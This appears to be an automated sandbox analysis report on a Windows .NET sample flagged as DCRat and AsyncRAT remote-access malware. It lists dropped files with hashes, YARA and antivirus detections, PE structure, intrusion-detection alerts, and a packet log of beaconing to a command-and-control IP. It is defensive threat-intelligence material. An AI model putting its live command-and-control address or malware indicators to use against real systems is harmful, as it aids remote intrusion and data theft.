                                          SSDEEP:3:bMj9dOtddcwKHgLnT1:2mjK+n5
                                          MD5:929FE3664F372034A4B03360129BEC57
                                          SHA1:CDF68EF39D5BDB7F85C82A9E12122C806291A0EB
                                          SHA-256:0FBBFBE1931094F2EB8CBDA041F8FD69AC33B07728D44CD8BEEC8DED8A492BEF
                                          SHA-512:558405B57190094C9987A6323DB4CC22E355CADBB4780C25FF6A632F49A7BA227299E6B20AC126B6412E6C25E6C32E337D84C7F03C4D3C14E431CC2EF47ABABC
                                          Malicious:false
                                          Preview:lJoOilyxhqi7rMeJ0EP7FWx8HQuVbaJgVsE98FCw5SUamME1X9kgBi7P
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):1835008
                                          Entropy (8bit):4.394317244435007
                                          Encrypted:false
                                          SSDEEP:6144:fl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNA9OBSqa:d4vF0MYQUMM6VFYS9U
                                          MD5:16A7B6CB8F23A4CF2037F1EF97AF47DB
                                          SHA1:C457EA2B19750CA7A85F1259345CC2ECE6CAE588
                                          SHA-256:469B519CC56D048E8D784A06706653F9786C924E9DC7B48463439A9937C30239
                                          SHA-512:62A251A6D74431B0DE2F40228CB0D908EBBBA92085B90292A3C26DA4D24DAB94CF38FC1B88B47AD241D5AE0A465B108A21992F79F0018E3C70DEBEE4C2832ECF
                                          Malicious:false
                                          Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmB.z.x@................................................................................................................................................................................................................................................................................................................................................m.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):160
                                          Entropy (8bit):5.555792510520905
                                          Encrypted:false
                                          SSDEEP:3:SUU6s1g3jjl9BHg1jrWAIYxwsDG1C0XddWd8hghd7c7YiuGCNqJ0R:SUi1y/m1jr7IYpGTXdY82s7YHL8J0R
                                          MD5:904A977536AC285CF9DA8B24858365FF
                                          SHA1:59F5E309C1D2A3E40EBB92DF3D537A9CDA0E2FFF
                                          SHA-256:DA61F7E1AA992F473F6A1F57B4E906613B0620910AA73DBFE3C02F9DE4CC909D
                                          SHA-512:2439B4183A1E3227B828EB5032AD69D04BF742E17AA1B0B9CEE724406DF742D3ADB5F9D316A69F789710A999BBF0052D2D2261ED220EF987802164915EAC4A13
                                          Malicious:false
                                          Preview:xXzgWbqX8MMO2SkgPERxDlMYrZaNEdXzdkl7xfYPFKvn0qBP9AulgvFMKay7BcSezXvSrmtupCr3zjhBYKODtwSreZxWqbOn1Qxd4tiWR95eEMWk3wi0OPvDEDxRzXDNyDCiwDHpm1wt0ynSDMc43XZlfuZ15Qh4
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):586240
                                          Entropy (8bit):5.885921147077287
                                          Encrypted:false
                                          SSDEEP:12288:IqnOvrM40FWBGCnO9Ke6/jGEn1E7idK9IbrDDiokL05t4:I+OvrM40FgDRlrGwSO4S7DP
                                          MD5:222EDC84E2D32948F2639554B23E7B04
                                          SHA1:22CEDF83A69B08259DB3C2F3618DF067DD7C7522
                                          SHA-256:55AB1B21734F31815058FA1E2841E8B62E6E4F04E635A4B51EBEA3FDE646E920
                                          SHA-512:95DD51CF8BE6461955B867B853D58EAB7BF6AC363E9F99F5C8C8F13046DAA373ED845DB3531E9F765515E43F8955955EC4EA83F19807A2B3C04F2C1F6A0C6855
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Windows\regedit\explorer.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\regedit\explorer.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 88%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L9a..........".................~.... ... ....@.. .......................`............@.................................(...S.... ..H....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H.... ......................@..@.reloc.......@......................@..B................`.......H.......P.......................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.801535722709987
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:UNFOT5F1qt.exe
                                          File size:1'131'531 bytes
                                          MD5:1c40d9e61fbbd5d9054638b98b10e1cf
                                          SHA1:145119e649cabc6c60200643b3cc347fc4b164cc
                                          SHA256:854b586f8d0cad52a042ccee32691dc9c30e6a32bd3805024934f43e169325af
                                          SHA512:970eade0dce9dfaf5acdaf88721e55071fc48c4570c9a9b78c875d81fba54b047aed93412e331466a461662e065020f189b1dc1ec324b9394dd531ab2e3b3cf1
                                          SSDEEP:24576:TE9h8YY4mB7WnMSTdTvX+5pdKj30HZQHEGP:TeGYDmBcBpvEpdKj3W/i
                                          TLSH:553501499BAE8639CE7D1EB4F21114184AB2AE26E095E3C4DEDDB6ED4533784CC31237
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.gq..........a.... ........@.. ....................................`................................
                                          Icon Hash:46c98dc446623245
                                          Entrypoint:0x4e9161
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0xE61CCFF4 [Sat May 3 10:12:04 2092 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Signature Valid:
                                          Signature Issuer:
                                          Signature Validation Error:
                                          Error Number:
                                          Not Before, Not After
                                            Subject Chain
                                              Version:
                                              Thumbprint MD5:
                                              Thumbprint SHA-1:
                                              Thumbprint SHA-256:
                                              Serial:
                                               Instruction
                                               jmp dword ptr [00402000h]
                                               add byte ptr [eax], al (listed 97 times in a row: the bytes following the entrypoint jmp are zeros, which disassemble to this instruction)
                                               Name | Virtual Address | Virtual Size | Is in Section
                                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe905c | 0x4a | .text
                                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xea000 | 0x2cd48 | .rsrc
                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0xefc00 | 0x1270 | .rsrc
                                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x118000 | 0xc | .reloc
                                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0xe90a6 | 0x38 | .text
                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                               Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                               .text | 0x2000 | 0xe7167 | 0xe7200 | 39f6b20fe9c32911bf9330e3aead9ca1 | False | 0.9104372295835587 | PGP symmetric key encrypted data - Plaintext or unencrypted data | 7.874259568369085 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                               .rsrc | 0xea000 | 0x2cd48 | 0x2ce00 | 7a3386583914fe3ce52d18a7b66a0189 | False | 0.4698435323816156 | data | 6.865694273270142 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                               .reloc | 0x118000 | 0xc | 0x200 | ee3c2191b84ea0ab4f6f399ed7978f51 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                               Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                               IBC | 0xea244 | 0x7cf6 | data | | | 0.619849953110347
                                               RT_ICON | 0xf1f3c | 0xc46d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 1.0005170527990455
                                               RT_ICON | 0xfe3ac | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m | | | 0.1391074174849166
                                               RT_ICON | 0x10ebd4 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m | | | 0.15050779404818138
                                               RT_ICON | 0x112dfc | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m | | | 0.16919087136929462
                                               RT_ICON | 0x1153a4 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m | | | 0.22467166979362102
                                               RT_ICON | 0x11644c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m | | | 0.3829787234042553
                                               RT_GROUP_ICON | 0x1168b4 | 0x5a | data | | | 0.7333333333333333
                                               RT_VERSION | 0x116910 | 0x438 | data | English | United States | 0.48148148148148145
                                               DLL | Import
                                               mscoree.dll | _CorExeMain
                                               Language of compilation system | Country where language is spoken | Map
                                               English | United States |
                                               Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                               2024-11-27T04:02:07.712551+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.9 | 49723 | 188.120.228.203 | 80 | TCP
                                               2024-11-27T04:02:17.428898+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.9 | 49746 | 188.120.228.203 | 80 | TCP
                                               2024-11-27T04:02:25.553488+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.9 | 49767 | 188.120.228.203 | 80 | TCP
                                               2024-11-27T04:02:33.366043+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.9 | 49785 | 188.120.228.203 | 80 | TCP
                                               2024-11-27T04:02:42.961482+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.9 | 49806 | 188.120.228.203 | 80 | TCP
                                               2024-11-27T04:02:51.179051+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.9 | 49827 | 188.120.228.203 | 80 | TCP
                                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                               Nov 27, 2024 04:02:06.178472996 CET | 49723 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:06.298363924 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:06.298496962 CET | 49723 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:06.299420118 CET | 49723 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:06.419374943 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:07.712311983 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:07.712337017 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:07.712476015 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:07.712551117 CET | 49723 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:07.712554932 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:07.712569952 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:07.712650061 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:07.712698936 CET | 49723 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:07.712721109 CET | 49723 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:07.712729931 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:07.712806940 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:07.712817907 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:07.712830067 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:07.712886095 CET | 49723 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:07.712886095 CET | 49723 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:07.833177090 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:07.877996922 CET | 49723 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:07.922651052 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:07.927748919 CET | 49723 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:08.047686100 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:08.378654003 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:08.378684044 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:08.378747940 CET | 49723 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:08.382698059 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:08.385123014 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:08.385178089 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:08.385179996 CET | 49723 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:08.393502951 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:08.393563986 CET | 49723 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:08.393606901 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:08.401941061 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:08.402002096 CET | 49723 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:08.402038097 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:08.410280943 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:08.410347939 CET | 49723 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:08.588783979 CET | 80 | 49723 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:08.643434048 CET | 49723 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:08.664591074 CET | 49723 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:15.986710072 CET | 49746 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:16.106806993 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:16.106945992 CET | 49746 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:16.107333899 CET | 49746 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:16.227278948 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:17.428755045 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:17.428841114 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:17.428879023 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:17.428898096 CET | 49746 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:17.429060936 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:17.429070950 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:17.429083109 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:17.429092884 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:17.429100990 CET | 49746 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:17.429122925 CET | 49746 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:17.429294109 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:17.429339886 CET | 49746 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:17.429363012 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:17.429378986 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:17.429414988 CET | 49746 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:17.548954010 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:17.549043894 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:17.549089909 CET | 49746 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:17.553106070 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:17.596565962 CET | 49746 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:17.620759010 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:17.623728037 CET | 49746 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:17.743735075 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:18.055687904 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:18.056252956 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:18.056304932 CET | 49746 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:18.056340933 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:18.061096907 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:18.061155081 CET | 49746 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:18.061198950 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:18.069591045 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:18.069637060 CET | 49746 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:18.069802999 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:18.077878952 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:18.077929020 CET | 49746 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:18.077975988 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:18.086262941 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:18.086350918 CET | 49746 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:18.086374044 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:18.094616890 CET | 80 | 49746 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:18.094666958 CET | 49746 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:18.095801115 CET | 49746 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:24.054023027 CET | 49767 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:24.174032927 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:24.174199104 CET | 49767 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:24.174798965 CET | 49767 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:24.294722080 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:25.553308964 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:25.553406000 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:25.553419113 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:25.553488016 CET | 49767 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:25.553567886 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:25.553580999 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:25.553594112 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:25.553622961 CET | 49767 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:25.553668976 CET | 49767 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:25.553744078 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:25.553755999 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:25.553769112 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:25.553782940 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:25.553805113 CET | 49767 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:25.553836107 CET | 49767 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:25.673710108 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:25.673768044 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:25.673877001 CET | 49767 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:25.676346064 CET | 49767 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:25.796761036 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:26.124521017 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:26.124706984 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:26.124787092 CET | 49767 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:26.128654003 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:26.128818035 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:26.128882885 CET | 49767 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:26.137125969 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:26.140943050 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:26.141005039 CET | 49767 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:26.141062021 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:26.149382114 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:26.149477005 CET | 49767 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:26.149558067 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:26.157704115 CET | 80 | 49767 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:26.157773972 CET | 49767 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:26.159202099 CET | 49767 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:31.877506971 CET | 49785 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:31.997481108 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:31.997565031 CET | 49785 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:31.998044968 CET | 49785 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:32.117995977 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:33.365844011 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:33.365963936 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:33.366022110 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:33.366034985 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:33.366043091 CET | 49785 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:33.366075039 CET | 49785 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:33.366108894 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:33.366122007 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:33.366132975 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:33.366143942 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:33.366163015 CET | 49785 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:33.366173983 CET | 49785 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:33.366302967 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:33.366321087 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
                                               Nov 27, 2024 04:02:33.366369963 CET | 49785 | 80 | 192.168.2.9 | 188.120.228.203
                                               Nov 27, 2024 04:02:33.486138105 CET | 80 | 49785 | 188.120.228.203 | 192.168.2.9
